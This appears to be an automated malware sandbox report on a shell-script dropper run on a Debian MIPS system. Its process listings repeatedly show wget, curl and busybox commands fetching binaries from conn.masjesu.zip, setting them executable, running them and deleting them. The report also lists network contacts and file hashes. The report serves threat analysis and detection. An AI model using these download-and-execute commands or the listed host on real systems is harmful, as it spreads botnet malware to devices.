[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR
[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/bin/rm
[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/chmod
[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5
[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/bin/rm
[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/chmod
[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB
[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/bin/rm
[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/chmod
[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O
[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/bin/rm
[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/chmod
[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5
[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/bin/rm
[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/chmod
[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey
[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/bin/rm
[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/chmod
[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/rm
[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/chmod
[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/rm
[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/chmod
[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/rm
[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 01:26
Reported
2024-11-24 01:28
Platform
debian9-mipsel-20240226-en
Max time kernel
125s
Max time network
156s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | N/A |
| N/A | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | N/A |
| N/A | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | N/A |
| N/A | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | N/A |
| N/A | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | N/A |
| N/A | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | N/A |
| N/A | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | N/A |
| N/A | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | N/A |
| N/A | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | N/A |
| N/A | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | N/A |
| N/A | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | N/A |
| N/A | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | N/A |
| N/A | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | N/A |
| N/A | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | N/A |
| N/A | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | N/A |
| N/A | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | N/A |
| N/A | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | N/A |
| N/A | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /usr/bin/curl | N/A |
| File opened for modification | /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 | /usr/bin/curl | N/A |
Processes
/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh
[/tmp/d94a758004babc79e50397207aa224489a2765d8525bd9b2dcdbc8ec2301d4a7.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/chmod
[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/bin/rm
[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/chmod
[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/bin/rm
[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/chmod
[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]
/bin/rm
